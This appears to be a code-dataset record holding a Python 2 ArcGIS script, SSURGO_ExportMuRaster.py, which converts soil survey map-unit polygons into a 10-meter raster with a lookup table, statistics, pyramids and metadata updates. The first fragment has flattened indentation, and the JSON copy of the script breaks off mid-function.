with arcpy.da.SearchCursor(muPolygon, ["mukey"], "", "", "", sql_clause=sqlClause) as srcCursor:
# Create a unique, sorted list of MUKEY values in the MUPOLYGON featureclass
mukeyList = [row[0] for row in srcCursor]
mukeyList.sort()
if len(mukeyList) == 0:
raise MyError, "Failed to get MUKEY values from " + muPolygon
muCnt = len(mukeyList)
# Load MUKEY values into Lookup table
#
#PrintMsg("\tSaving " + Number_Format(muCnt, 0, True) + " MUKEY values for " + Number_Format(polyCnt, 0, True) + " polygons" , 0)
arcpy.SetProgressorLabel("Creating lookup table...")
with arcpy.da.InsertCursor(lu, ("CELLVALUE", "mukey") ) as inCursor:
for mukey in mukeyList:
rec = mukey, mukey
inCursor.insertRow(rec)
# Add MUKEY attribute index to Lookup table
arcpy.AddIndex_management(lu, ["mukey"], "Indx_LU")
#
# End of Lookup table code
# Match NLCD raster (snapraster)
cdlRasters = arcpy.ListRasters("wsCDL*")
if len(cdlRasters) == 0:
raise MyError, "Required Cropland Data Layer rasters missing from " + gdb
else:
cdlRaster = cdlRasters[-1]
env.snapRaster = cdlRaster
#env.extent = cdlRaster
# Raster conversion process...
#
PrintMsg(" \nConverting featureclass " + os.path.basename(muPolygon) + " to raster (" + str(iRaster) + " meter)", 0)
tmpPolys = "poly_tmp"
arcpy.MakeFeatureLayer_management (muPolygon, tmpPolys)
arcpy.AddJoin_management (tmpPolys, "mukey", lu, "mukey", "KEEP_ALL")
arcpy.SetProgressor("default", "Running PolygonToRaster conversion...")
# Need to make sure that the join was successful
time.sleep(1)
rasterFields = arcpy.ListFields(tmpPolys)
rasterFieldNames = list()
for rFld in rasterFields:
rasterFieldNames.append(rFld.name.upper())
if not "LOOKUP.CELLVALUE" in rasterFieldNames:
raise MyError, "Join failed for Lookup table (CELLVALUE)"
if (os.path.basename(muPolygon).upper() + ".MUKEY") in rasterFieldNames:
#raise MyError, "Join failed for Lookup table (SPATIALVERSION)"
priorityFld = os.path.basename(muPolygon) + ".MUKEY"
else:
priorityFld = os.path.basename(muPolygon) + ".CELLVALUE"
#ListEnv()
arcpy.PolygonToRaster_conversion(tmpPolys, "Lookup.CELLVALUE", outputRaster, "MAXIMUM_COMBINED_AREA", "", iRaster) # No priority field for single raster
# immediately delete temporary polygon layer to free up memory for the rest of the process
time.sleep(1)
arcpy.Delete_management(tmpPolys)
# End of single raster process
# Now finish up the single temporary raster
#
PrintMsg(" \nFinalizing raster conversion process:", 0)
# Reset the stopwatch for the raster post-processing
#begin = time.time()
# Remove lookup table
if arcpy.Exists(lu):
arcpy.Delete_management(lu)
# ****************************************************
# Build pyramids and statistics
# ****************************************************
if arcpy.Exists(outputRaster):
time.sleep(1)
arcpy.SetProgressor("default", "Calculating raster statistics...")
PrintMsg("\tCalculating raster statistics...", 0)
env.pyramid = "PYRAMIDS -1 NEAREST"
arcpy.env.rasterStatistics = 'STATISTICS 100 100'
arcpy.CalculateStatistics_management (outputRaster, 1, 1, "", "OVERWRITE" )
if CheckStatistics(outputRaster) == False:
# For some reason the BuildPyramidsandStatistics command failed to build statistics for this raster.
#
# Try using CalculateStatistics while setting an AOI
PrintMsg("\tInitial attempt to create statistics failed, trying another method...", 0)
time.sleep(3)
if arcpy.Exists(os.path.join(gdb, "SAPOLYGON")):
# Try running CalculateStatistics with an AOI to limit the area that is processed
# if we have to use SAPOLYGON as an AOI, this will be REALLY slow
#arcpy.CalculateStatistics_management (outputRaster, 1, 1, "", "OVERWRITE", os.path.join(outputWS, "SAPOLYGON") )
arcpy.CalculateStatistics_management (outputRaster, 1, 1, "", "OVERWRITE" )
if CheckStatistics(outputRaster) == False:
time.sleep(3)
PrintMsg("\tFailed in both attempts to create statistics for raster layer", 1)
arcpy.SetProgressor("default", "Building pyramids...")
PrintMsg("\tBuilding pyramids...", 0)
arcpy.BuildPyramids_management(outputRaster, "-1", "NONE", "NEAREST", "DEFAULT", "", "SKIP_EXISTING")
# ****************************************************
# Add MUKEY to final raster
# ****************************************************
# Build attribute table for final output raster. Sometimes it fails to automatically build.
PrintMsg("\tBuilding raster attribute table and updating MUKEY values", )
arcpy.SetProgressor("default", "Building raster attrribute table...")
arcpy.BuildRasterAttributeTable_management(outputRaster)
# Add MUKEY values to final mapunit raster
#
arcpy.SetProgressor("default", "Adding MUKEY attribute to raster...")
arcpy.AddField_management(outputRaster, "MUKEY", "TEXT", "#", "#", "30")
with arcpy.da.UpdateCursor(outputRaster, ["VALUE", "MUKEY"]) as cur:
for rec in cur:
rec[1] = rec[0]
cur.updateRow(rec)
# Add attribute index (MUKEY) for raster
arcpy.AddIndex_management(outputRaster, ["mukey"], "Indx_RasterMukey")
else:
err = "Missing output raster (" + outputRaster + ")"
raise MyError, err
# Compare list of original mukeys with the list of raster mukeys
# Report discrepancies. These are usually thin polygons along survey boundaries,
# added to facilitate a line-join.
#
arcpy.SetProgressor("default", "Looking for missing map units...")
rCnt = int(arcpy.GetRasterProperties_management (outputRaster, "UNIQUEVALUECOUNT").getOutput(0))
        if rCnt != muCnt:
missingList = list()
rList = list()
# Create list of raster mukeys...
with arcpy.da.SearchCursor(outputRaster, ("MUKEY",)) as rcur:
for rec in rcur:
mukey = rec[0]
rList.append(mukey)
missingList = list(set(mukeyList) - set(rList))
queryList = list()
for mukey in missingList:
queryList.append("'" + mukey + "'")
if len(queryList) > 0:
PrintMsg("\tDiscrepancy in mapunit count for new raster", 1)
#PrintMsg("\t\tInput polygon mapunits: " + Number_Format(muCnt, 0, True), 0)
#PrintMsg("\t\tOutput raster mapunits: " + Number_Format(rCnt, 0, True), 0)
PrintMsg("The following MUKEY values were present in the original MUPOLYGON featureclass, ", 1)
PrintMsg("but not in the raster", 1)
PrintMsg("\t\tMUKEY IN (" + ", ".join(queryList) + ") \n ", 0)
# Update metadata file for the geodatabase
#
# Query the output SACATALOG table to get list of surveys that were exported to the gSSURGO
#
#saTbl = os.path.join(theGDB, "sacatalog")
#expList = list()
#with arcpy.da.SearchCursor(saTbl, ("AREASYMBOL", "SAVEREST")) as srcCursor:
# for rec in srcCursor:
# expList.append(rec[0] + " (" + str(rec[1]).split()[0] + ")")
#surveyInfo = ", ".join(expList)
surveyInfo = "" # could get this from SDA
#time.sleep(2)
arcpy.SetProgressorLabel("Updating metadata NOT...")
#bMetaData = UpdateMetadata(outputWS, outputRaster, surveyInfo, iRaster)
del outputRaster
del muPolygon
arcpy.CheckInExtension("Spatial")
return True
except MyError, e:
# Example: raise MyError, "This is an error message"
PrintMsg(str(e), 2)
arcpy.CheckInExtension("Spatial")
return False
except MemoryError:
raise MyError, "Not enough memory to process. Try running again with the 'Use tiles' option"
except:
errorMsg()
arcpy.CheckInExtension("Spatial")
return False
## ===================================================================================
## ===================================================================================
## MAIN
## ===================================================================================
# Import system modules
import sys, string, os, arcpy, locale, traceback, math, time, datetime, shutil
import xml.etree.cElementTree as ET
from arcpy import env
# Create the Geoprocessor object
try:
if __name__ == "__main__":
# get parameters
muPolygon = arcpy.GetParameterAsText(0) # required gSSURGO polygon layer
rasterName = arcpy.GetParameterAsText(1) # required name for output gdb raster
env.overwriteOutput= True
iRaster = 10
# Get Spatial Analyst extension
if arcpy.CheckExtension("Spatial") == "Available":
# try to find the name of the tile from the geodatabase name
# set the name of the output raster using the tilename and cell resolution
from arcpy.sa import *
arcpy.CheckOutExtension("Spatial")
else:
raise MyError, "Required Spatial Analyst extension is not available"
# Call function that does all of the work
        bRaster = ConvertToRaster(muPolygon, rasterName)
arcpy.CheckInExtension("Spatial")
except MyError, e:
# Example: raise MyError, "This is an error message"
PrintMsg(str(e), 2)
except:
errorMsg()
|
normal
|
{
"blob_id": "d9a871fb6c889bcff455732007718af734859c72",
"index": 1325,
"step-1": "# SSURGO_ExportMuRaster.py\r\n#\r\n# Convert MUPOLYGON featureclass to raster for the specified SSURGO geodatabase.\r\n# By default any small NoData areas (< 5000 sq meters) will be filled using\r\n# the Majority value.\r\n#\r\n# Input mupolygon featureclass must have a projected coordinate system or it will skip.\r\n# Input databases and featureclasses must use naming convention established by the\r\n# 'SDM Export By State' tool.\r\n#\r\n# For geographic regions that have USGS NLCD available, the tool wil automatically\r\n# align the coordinate system and raster grid to match.\r\n#\r\n# 10-31-2013 Added gap fill method\r\n#\r\n# 11-05-2014\r\n# 11-22-2013\r\n# 12-10-2013 Problem with using non-unique cellvalues for raster. Going back to\r\n# creating an integer version of MUKEY in the mapunit polygon layer.\r\n# 12-13-2013 Occasionally see error messages related to temporary GRIDs (g_g*) created\r\n# under \"C:\\Users\\steve.peaslee\\AppData\\Local\\Temp\\a subfolder\". These\r\n# are probably caused by orphaned INFO tables.\r\n# 01-08-2014 Added basic raster metadata (still need process steps)\r\n# 01-12-2014 Restricted conversion to use only input MUPOLYGON featureclass having\r\n# a projected coordinate system with linear units=Meter\r\n# 01-31-2014 Added progressor bar to 'Saving MUKEY values..'. Seems to be a hangup at this\r\n# point when processing CONUS geodatabase\r\n# 02-14-2014 Changed FeatureToLayer (CELL_CENTER) to PolygonToRaster (MAXIMUM_COMBINED_AREA)\r\n# and removed the Gap Fill option.\r\n# 2014-09-27 Added ISO metadata import\r\n#\r\n# 2014-10-18 Noticed that failure to create raster seemed to be related to long\r\n# file names or non-alphanumeric characters such as a dash in the name.\r\n#\r\n# 2014-10-29 Removed ORDER BY MUKEY sql clause because some computers were failing on that line.\r\n# Don't understand why.\r\n#\r\n# 2014-10-31 Added error message if the MUKEY column is not populated in the MUPOLYGON featureclass\r\n#\r\n# 2014-11-04 Problems occur when the user's gp environment points to Default.gdb for the scratchWorkpace.\r\n# Added a fatal error message when that occurs.\r\n#\r\n# 2015-01-15 Hopefully fixed some of the issues that caused the raster conversion to crash at the end.\r\n# Cleaned up some of the current workspace settings and moved the renaming of the final raster.\r\n#\r\n# 2015-02-26 Adding option for tiling raster conversion by areasymbol and then mosaicing. Slower and takes\r\n# more disk space, but gets the job done when otherwise PolygonToRaster fails on big datasets.\r\n\r\n# 2015-02-27 Make bTiling variable an integer (0, 2, 5) that can be used to slice the areasymbol value. This will\r\n# give the user an option to tile by state (2) or by survey area (5)\r\n# 2015-03-10 Moved sequence of CheckInExtension. It was at the beginning which seems wrong.\r\n#\r\n# 2015-03-11 Switched tiled raster format from geodatabase raster to TIFF. This should allow the entire\r\n# temporary folder to be deleted instead of deleting rasters one-at-a-time (slow).\r\n# 2015-03-11 Added attribute index (mukey) to raster attribute table\r\n# 2015-03-13 Modified output raster name by incorporating the geodatabase name (after '_' and before \".gdb\")\r\n#\r\n# 2015-09-16 Temporarily renamed output raster using a shorter string\r\n#\r\n# 2015-09-16 Trying several things to address 9999 failure on CONUS. 
Created a couple of ArcInfo workspace in temp\r\n# 2015-09-16 Compacting geodatabase before PolygonToRaster conversion\r\n#\r\n# 2015-09-18 Still having problems with CONUS raster even with ArcGIS 10.3. Even the tiled method failed once\r\n# on AR105. Actually may have been the next survey, but random order so don't know which one for sure.\r\n# Trying to reorder mosaic to match the spatial order of the polygon layers. Need to figure out if\r\n# the 99999 error in PolygonToRaster is occurring with the same soil survey or same count or any\r\n# other pattern.\r\n#\r\n# 2015-09-18 Need to remember to turn off all layers in ArcMap. Redraw is triggered after each tile.\r\n#\r\n# 2015-10-01 Found problem apparently caused by 10.3. SnapRaster functionality was failing with tiles because of\r\n# MakeFeatureLayer where_clause. Perhaps due to cursor lock persistence? Rewrote entire function to\r\n# use SAPOLYGON featureclass to define extents for tiles. This seems to be working better anyway.\r\n#\r\n# 2015-10-02 Need to look at some method for sorting the extents of each tile and sort them in a geographic fashion.\r\n# A similar method was used in the Create gSSURGO database tools for the Append process.\r\n#\r\n# 2015-10-23 Jennifer and I finally figured out what was causing her PolygonToRaster 9999 errors.\r\n# It was dashes in the output GDB path. Will add a check for bad characters in path.\r\n#\r\n# 2015-10-26 Changed up SnapToNLCD function to incorporate SnapRaster input as long as the coordinate\r\n# system matches and the extent coordinates are integer (no floating point!).\r\n#\r\n# 2015-10-27 Looking at possible issue with batchmode processing of rasters. Jennifer had several\r\n# errors when trying to run all states at once.\r\n#\r\n# 2015-11-03 Fixed failure when indexing non-geodatabase rasters such as .IMG.\r\n\r\n## ===================================================================================\r\nclass MyError(Exception):\r\n pass\r\n\r\n## ===================================================================================\r\ndef PrintMsg(msg, severity=0):\r\n # prints message to screen if run as a python script\r\n # Adds tool message to the geoprocessor\r\n #\r\n #Split the message on \\n first, so that if it's multiple lines, a GPMessage will be added for each line\r\n try:\r\n for string in msg.split('\\n'):\r\n #Add a geoprocessing message (in case this is run as a tool)\r\n if severity == 0:\r\n arcpy.AddMessage(string)\r\n\r\n elif severity == 1:\r\n arcpy.AddWarning(string)\r\n\r\n elif severity == 2:\r\n arcpy.AddMessage(\" \")\r\n arcpy.AddError(string)\r\n\r\n except:\r\n pass\r\n\r\n## ===================================================================================\r\ndef errorMsg():\r\n try:\r\n tb = sys.exc_info()[2]\r\n tbinfo = traceback.format_tb(tb)[0]\r\n theMsg = tbinfo + \"\\n\" + str(sys.exc_type)+ \": \" + str(sys.exc_value)\r\n PrintMsg(theMsg, 2)\r\n\r\n except:\r\n PrintMsg(\"Unhandled error in errorMsg method\", 2)\r\n pass\r\n\r\n## ===================================================================================\r\ndef WriteToLog(theMsg, theRptFile):\r\n # prints message to screen if run as a python script\r\n # Adds tool message to the geoprocessor\r\n #print msg\r\n #\r\n try:\r\n fh = open(theRptFile, \"a\")\r\n theMsg = \"\\n\" + theMsg\r\n fh.write(theMsg)\r\n fh.close()\r\n\r\n except:\r\n errorMsg()\r\n pass\r\n\r\n## ===================================================================================\r\ndef elapsedTime(start):\r\n # 
Calculate amount of time since \"start\" and return time string\r\n try:\r\n # Stop timer\r\n #\r\n end = time.time()\r\n\r\n # Calculate total elapsed seconds\r\n eTotal = end - start\r\n\r\n # day = 86400 seconds\r\n # hour = 3600 seconds\r\n # minute = 60 seconds\r\n\r\n eMsg = \"\"\r\n\r\n # calculate elapsed days\r\n eDay1 = eTotal / 86400\r\n eDay2 = math.modf(eDay1)\r\n eDay = int(eDay2[1])\r\n eDayR = eDay2[0]\r\n\r\n if eDay > 1:\r\n eMsg = eMsg + str(eDay) + \" days \"\r\n elif eDay == 1:\r\n eMsg = eMsg + str(eDay) + \" day \"\r\n\r\n # Calculated elapsed hours\r\n eHour1 = eDayR * 24\r\n eHour2 = math.modf(eHour1)\r\n eHour = int(eHour2[1])\r\n eHourR = eHour2[0]\r\n\r\n if eDay > 0 or eHour > 0:\r\n if eHour > 1:\r\n eMsg = eMsg + str(eHour) + \" hours \"\r\n else:\r\n eMsg = eMsg + str(eHour) + \" hour \"\r\n\r\n # Calculate elapsed minutes\r\n eMinute1 = eHourR * 60\r\n eMinute2 = math.modf(eMinute1)\r\n eMinute = int(eMinute2[1])\r\n eMinuteR = eMinute2[0]\r\n\r\n if eDay > 0 or eHour > 0 or eMinute > 0:\r\n if eMinute > 1:\r\n eMsg = eMsg + str(eMinute) + \" minutes \"\r\n else:\r\n eMsg = eMsg + str(eMinute) + \" minute \"\r\n\r\n # Calculate elapsed secons\r\n eSeconds = \"%.1f\" % (eMinuteR * 60)\r\n\r\n if eSeconds == \"1.00\":\r\n eMsg = eMsg + eSeconds + \" second \"\r\n else:\r\n eMsg = eMsg + eSeconds + \" seconds \"\r\n\r\n return eMsg\r\n\r\n except:\r\n errorMsg()\r\n return \"\"\r\n\r\n## ===================================================================================\r\ndef Number_Format(num, places=0, bCommas=True):\r\n try:\r\n # Format a number according to locality and given places\r\n #locale.setlocale(locale.LC_ALL, \"\")\r\n if bCommas:\r\n theNumber = locale.format(\"%.*f\", (places, num), True)\r\n\r\n else:\r\n theNumber = locale.format(\"%.*f\", (places, num), False)\r\n return theNumber\r\n\r\n except:\r\n errorMsg()\r\n return False\r\n\r\n## ===================================================================================\r\ndef CheckStatistics(outputRaster):\r\n # For no apparent reason, ArcGIS sometimes fails to build statistics. 
Might work one\r\n # time and then the next time it may fail without any error message.\r\n #\r\n try:\r\n #PrintMsg(\" \\n\\tChecking raster statistics\", 0)\r\n\r\n for propType in ['MINIMUM', 'MAXIMUM', 'MEAN', 'STD']:\r\n statVal = arcpy.GetRasterProperties_management (outputRaster, propType).getOutput(0)\r\n #PrintMsg(\"\\t\\t\" + propType + \": \" + statVal, 1)\r\n\r\n return True\r\n\r\n except:\r\n return False\r\n\r\n## ===================================================================================\r\ndef UpdateMetadata(outputWS, target, surveyInfo, iRaster):\r\n #\r\n # Used for non-ISO metadata\r\n #\r\n # Search words: xxSTATExx, xxSURVEYSxx, xxTODAYxx, xxFYxx\r\n #\r\n try:\r\n PrintMsg(\"\\tUpdating metadata...\")\r\n arcpy.SetProgressor(\"default\", \"Updating metadata\")\r\n\r\n # Set metadata translator file\r\n dInstall = arcpy.GetInstallInfo()\r\n installPath = dInstall[\"InstallDir\"]\r\n prod = r\"Metadata/Translator/ARCGIS2FGDC.xml\"\r\n mdTranslator = os.path.join(installPath, prod)\r\n\r\n # Define input and output XML files\r\n mdImport = os.path.join(env.scratchFolder, \"xxImport.xml\") # the metadata xml that will provide the updated info\r\n xmlPath = os.path.dirname(sys.argv[0])\r\n mdExport = os.path.join(xmlPath, \"gSSURGO_MapunitRaster.xml\") # original template metadata in script directory\r\n\r\n # Cleanup output XML files from previous runs\r\n if os.path.isfile(mdImport):\r\n os.remove(mdImport)\r\n\r\n # Get replacement value for the search words\r\n #\r\n stDict = StateNames()\r\n st = os.path.basename(outputWS)[8:-4]\r\n\r\n if st in stDict:\r\n # Get state name from the geodatabase\r\n mdState = stDict[st]\r\n\r\n else:\r\n # Leave state name blank. In the future it would be nice to include a tile name when appropriate\r\n mdState = \"\"\r\n\r\n # Set date strings for metadata, based upon today's date\r\n #\r\n d = datetime.date.today()\r\n today = str(d.isoformat().replace(\"-\",\"\"))\r\n\r\n # Set fiscal year according to the current month. If run during January thru September,\r\n # set it to the current calendar year. 
Otherwise set it to the next calendar year.\r\n #\r\n if d.month > 9:\r\n fy = \"FY\" + str(d.year + 1)\r\n\r\n else:\r\n fy = \"FY\" + str(d.year)\r\n\r\n # Convert XML to tree format\r\n tree = ET.parse(mdExport)\r\n root = tree.getroot()\r\n\r\n # new citeInfo has title.text, edition.text, serinfo/issue.text\r\n citeInfo = root.findall('idinfo/citation/citeinfo/')\r\n\r\n if not citeInfo is None:\r\n # Process citation elements\r\n # title, edition, issue\r\n #\r\n for child in citeInfo:\r\n #PrintMsg(\"\\t\\t\" + str(child.tag), 0)\r\n if child.tag == \"title\":\r\n if child.text.find('xxSTATExx') >= 0:\r\n child.text = child.text.replace('xxSTATExx', mdState)\r\n\r\n elif mdState != \"\":\r\n child.text = child.text + \" - \" + mdState\r\n\r\n elif child.tag == \"edition\":\r\n if child.text == 'xxFYxx':\r\n child.text = fy\r\n\r\n elif child.tag == \"serinfo\":\r\n for subchild in child.iter('issue'):\r\n if subchild.text == \"xxFYxx\":\r\n subchild.text = fy\r\n\r\n # Update place keywords\r\n ePlace = root.find('idinfo/keywords/place')\r\n\r\n if not ePlace is None:\r\n #PrintMsg(\"\\t\\tplace keywords\", 0)\r\n\r\n for child in ePlace.iter('placekey'):\r\n if child.text == \"xxSTATExx\":\r\n child.text = mdState\r\n\r\n elif child.text == \"xxSURVEYSxx\":\r\n child.text = surveyInfo\r\n\r\n # Update credits\r\n eIdInfo = root.find('idinfo')\r\n if not eIdInfo is None:\r\n #PrintMsg(\"\\t\\tcredits\", 0)\r\n\r\n for child in eIdInfo.iter('datacred'):\r\n sCreds = child.text\r\n\r\n if sCreds.find(\"xxSTATExx\") >= 0:\r\n #PrintMsg(\"\\t\\tcredits \" + mdState, 0)\r\n child.text = child.text.replace(\"xxSTATExx\", mdState)\r\n\r\n if sCreds.find(\"xxFYxx\") >= 0:\r\n #PrintMsg(\"\\t\\tcredits \" + fy, 0)\r\n child.text = child.text.replace(\"xxFYxx\", fy)\r\n\r\n if sCreds.find(\"xxTODAYxx\") >= 0:\r\n #PrintMsg(\"\\t\\tcredits \" + today, 0)\r\n child.text = child.text.replace(\"xxTODAYxx\", today)\r\n\r\n idPurpose = root.find('idinfo/descript/purpose')\r\n if not idPurpose is None:\r\n ip = idPurpose.text\r\n\r\n if ip.find(\"xxFYxx\") >= 0:\r\n idPurpose.text = ip.replace(\"xxFYxx\", fy)\r\n #PrintMsg(\"\\t\\tpurpose\", 0)\r\n\r\n # create new xml file which will be imported, thereby updating the table's metadata\r\n tree.write(mdImport, encoding=\"utf-8\", xml_declaration=None, default_namespace=None, method=\"xml\")\r\n\r\n # import updated metadata to the geodatabase table\r\n # Using three different methods with the same XML file works for ArcGIS 10.1\r\n #\r\n #PrintMsg(\"\\t\\tApplying metadata translators...\")\r\n arcpy.MetadataImporter_conversion (mdImport, target)\r\n arcpy.ImportMetadata_conversion(mdImport, \"FROM_FGDC\", target, \"DISABLED\")\r\n\r\n # delete the temporary xml metadata file\r\n if os.path.isfile(mdImport):\r\n os.remove(mdImport)\r\n pass\r\n\r\n # delete metadata tool logs\r\n logFolder = os.path.dirname(env.scratchFolder)\r\n logFile = os.path.basename(mdImport).split(\".\")[0] + \"*\"\r\n\r\n\r\n currentWS = env.workspace\r\n env.workspace = logFolder\r\n logList = arcpy.ListFiles(logFile)\r\n\r\n for lg in logList:\r\n arcpy.Delete_management(lg)\r\n\r\n env.workspace = currentWS\r\n\r\n return True\r\n\r\n except:\r\n errorMsg()\r\n False\r\n\r\n## ===================================================================================\r\ndef CheckSpatialReference(muPolygon):\r\n # Make sure that the coordinate system is projected and units are meters\r\n try:\r\n desc = arcpy.Describe(muPolygon)\r\n inputSR = desc.spatialReference\r\n\r\n if 
inputSR.type.upper() == \"PROJECTED\":\r\n if inputSR.linearUnitName.upper() == \"METER\":\r\n env.outputCoordinateSystem = inputSR\r\n return True\r\n\r\n else:\r\n raise MyError, os.path.basename(theGDB) + \": Input soil polygon layer does not have a valid coordinate system for gSSURGO\"\r\n\r\n else:\r\n raise MyError, os.path.basename(theGDB) + \": Input soil polygon layer must have a projected coordinate system\"\r\n\r\n except MyError, e:\r\n # Example: raise MyError, \"This is an error message\"\r\n PrintMsg(str(e), 2)\r\n return False\r\n\r\n except:\r\n errorMsg()\r\n return False\r\n\r\n## ===================================================================================\r\ndef ConvertToRaster(muPolygon, rasterName):\r\n # main function used for raster conversion\r\n try:\r\n #\r\n # Set geoprocessing environment\r\n #\r\n env.overwriteOutput = True\r\n arcpy.env.compression = \"LZ77\"\r\n env.tileSize = \"128 128\"\r\n\r\n gdb = os.path.dirname(muPolygon)\r\n outputRaster = os.path.join(gdb, rasterName)\r\n iRaster = 10 # output resolution is 10 meters\r\n\r\n # Make sure that the env.scratchGDB is NOT Default.gdb. This causes problems for\r\n # some unknown reason.\r\n if (os.path.basename(env.scratchGDB).lower() == \"default.gdb\") or \\\r\n (os.path.basename(env.scratchWorkspace).lower() == \"default.gdb\") or \\\r\n (os.path.basename(env.scratchGDB).lower() == gdb):\r\n raise MyError, \"Invalid scratch workspace setting (\" + env.scratchWorkspace + \")\"\r\n\r\n # Create an ArcInfo workspace under the scratchFolder. Trying to prevent\r\n # 99999 errors for PolygonToRaster on very large databases\r\n #\r\n aiWorkspace = env.scratchFolder\r\n\r\n if not arcpy.Exists(os.path.join(aiWorkspace, \"info\")):\r\n #PrintMsg(\" \\nCreating ArcInfo workspace (\" + os.path.basename(aiWorkspace) + \") in: \" + os.path.dirname(aiWorkspace), 1)\r\n arcpy.CreateArcInfoWorkspace_management(os.path.dirname(aiWorkspace), os.path.basename(aiWorkspace))\r\n\r\n # turn off automatic Pyramid creation and Statistics calculation\r\n env.rasterStatistics = \"NONE\"\r\n env.pyramid = \"PYRAMIDS 0\"\r\n env.workspace = gdb\r\n\r\n # Need to check for dashes or spaces in folder names or leading numbers in database or raster names\r\n desc = arcpy.Describe(muPolygon)\r\n\r\n if not arcpy.Exists(muPolygon):\r\n raise MyError, \"Could not find input featureclass: \" + muPolygon\r\n\r\n # Check input layer's coordinate system to make sure horizontal units are meters\r\n # set the output coordinate system for the raster (neccessary for PolygonToRaster)\r\n if CheckSpatialReference(muPolygon) == False:\r\n return False\r\n\r\n # Sometimes it helps to compact large databases before raster conversion\r\n #arcpy.SetProgressorLabel(\"Compacting database prior to rasterization...\")\r\n #arcpy.Compact_management(gdb)\r\n\r\n # For rasters named using an attribute value, some attribute characters can result in\r\n # 'illegal' names.\r\n outputRaster = outputRaster.replace(\"-\", \"\")\r\n\r\n if arcpy.Exists(outputRaster):\r\n arcpy.Delete_management(outputRaster)\r\n time.sleep(1)\r\n\r\n if arcpy.Exists(outputRaster):\r\n err = \"Output raster (\" + os.path.basename(outputRaster) + \") already exists\"\r\n raise MyError, err\r\n\r\n #start = time.time() # start clock to measure total processing time\r\n #begin = time.time() # start clock to measure set up time\r\n time.sleep(2)\r\n\r\n PrintMsg(\" \\nBeginning raster conversion process\", 0)\r\n\r\n # Create Lookup table for storing MUKEY values and their 
integer counterparts\r\n #\r\n lu = os.path.join(env.scratchGDB, \"Lookup\")\r\n\r\n if arcpy.Exists(lu):\r\n arcpy.Delete_management(lu)\r\n\r\n # The Lookup table contains both MUKEY and its integer counterpart (CELLVALUE).\r\n # Using the joined lookup table creates a raster with CellValues that are the\r\n # same as MUKEY (but integer). This will maintain correct MUKEY values\r\n # during a moscaic or clip.\r\n #\r\n arcpy.CreateTable_management(os.path.dirname(lu), os.path.basename(lu))\r\n arcpy.AddField_management(lu, \"CELLVALUE\", \"LONG\")\r\n arcpy.AddField_management(lu, \"mukey\", \"TEXT\", \"#\", \"#\", \"30\")\r\n\r\n # Create list of areasymbols present in the MUPOLYGON featureclass\r\n # Having problems processing CONUS list of MUKEYs. Python seems to be running out of memory,\r\n # but I don't see high usage in Windows Task Manager\r\n #\r\n # PrintMsg(\" \\nscratchFolder set to: \" + env.scratchFolder, 1)\r\n\r\n\r\n # Create list of MUKEY values from the MUPOLYGON featureclass\r\n #\r\n # Create a list of map unit keys present in the MUPOLYGON featureclass\r\n #\r\n PrintMsg(\"\\tGetting list of mukeys from input soil polygon layer...\", 0)\r\n arcpy.SetProgressor(\"default\", \"Getting inventory of map units...\")\r\n tmpPolys = \"SoilPolygons\"\r\n sqlClause = (\"DISTINCT\", None)\r\n\r\n with arcpy.da.SearchCursor(muPolygon, [\"mukey\"], \"\", \"\", \"\", sql_clause=sqlClause) as srcCursor:\r\n # Create a unique, sorted list of MUKEY values in the MUPOLYGON featureclass\r\n mukeyList = [row[0] for row in srcCursor]\r\n\r\n mukeyList.sort()\r\n\r\n if len(mukeyList) == 0:\r\n raise MyError, \"Failed to get MUKEY values from \" + muPolygon\r\n\r\n muCnt = len(mukeyList)\r\n\r\n # Load MUKEY values into Lookup table\r\n #\r\n #PrintMsg(\"\\tSaving \" + Number_Format(muCnt, 0, True) + \" MUKEY values for \" + Number_Format(polyCnt, 0, True) + \" polygons\" , 0)\r\n arcpy.SetProgressorLabel(\"Creating lookup table...\")\r\n\r\n with arcpy.da.InsertCursor(lu, (\"CELLVALUE\", \"mukey\") ) as inCursor:\r\n for mukey in mukeyList:\r\n rec = mukey, mukey\r\n inCursor.insertRow(rec)\r\n\r\n # Add MUKEY attribute index to Lookup table\r\n arcpy.AddIndex_management(lu, [\"mukey\"], \"Indx_LU\")\r\n\r\n #\r\n # End of Lookup table code\r\n\r\n # Match NLCD raster (snapraster)\r\n cdlRasters = arcpy.ListRasters(\"wsCDL*\")\r\n\r\n if len(cdlRasters) == 0:\r\n raise MyError, \"Required Cropland Data Layer rasters missing from \" + gdb\r\n\r\n else:\r\n cdlRaster = cdlRasters[-1]\r\n\r\n env.snapRaster = cdlRaster\r\n #env.extent = cdlRaster\r\n\r\n # Raster conversion process...\r\n #\r\n PrintMsg(\" \\nConverting featureclass \" + os.path.basename(muPolygon) + \" to raster (\" + str(iRaster) + \" meter)\", 0)\r\n tmpPolys = \"poly_tmp\"\r\n arcpy.MakeFeatureLayer_management (muPolygon, tmpPolys)\r\n arcpy.AddJoin_management (tmpPolys, \"mukey\", lu, \"mukey\", \"KEEP_ALL\")\r\n arcpy.SetProgressor(\"default\", \"Running PolygonToRaster conversion...\")\r\n\r\n\r\n # Need to make sure that the join was successful\r\n time.sleep(1)\r\n rasterFields = arcpy.ListFields(tmpPolys)\r\n rasterFieldNames = list()\r\n\r\n for rFld in rasterFields:\r\n rasterFieldNames.append(rFld.name.upper())\r\n\r\n if not \"LOOKUP.CELLVALUE\" in rasterFieldNames:\r\n raise MyError, \"Join failed for Lookup table (CELLVALUE)\"\r\n\r\n if (os.path.basename(muPolygon).upper() + \".MUKEY\") in rasterFieldNames:\r\n #raise MyError, \"Join failed for Lookup table (SPATIALVERSION)\"\r\n priorityFld = 
os.path.basename(muPolygon) + \".MUKEY\"\r\n\r\n else:\r\n priorityFld = os.path.basename(muPolygon) + \".CELLVALUE\"\r\n\r\n\r\n #ListEnv()\r\n arcpy.PolygonToRaster_conversion(tmpPolys, \"Lookup.CELLVALUE\", outputRaster, \"MAXIMUM_COMBINED_AREA\", \"\", iRaster) # No priority field for single raster\r\n\r\n # immediately delete temporary polygon layer to free up memory for the rest of the process\r\n time.sleep(1)\r\n arcpy.Delete_management(tmpPolys)\r\n\r\n # End of single raster process\r\n\r\n\r\n # Now finish up the single temporary raster\r\n #\r\n PrintMsg(\" \\nFinalizing raster conversion process:\", 0)\r\n # Reset the stopwatch for the raster post-processing\r\n #begin = time.time()\r\n\r\n # Remove lookup table\r\n if arcpy.Exists(lu):\r\n arcpy.Delete_management(lu)\r\n\r\n # ****************************************************\r\n # Build pyramids and statistics\r\n # ****************************************************\r\n if arcpy.Exists(outputRaster):\r\n time.sleep(1)\r\n arcpy.SetProgressor(\"default\", \"Calculating raster statistics...\")\r\n 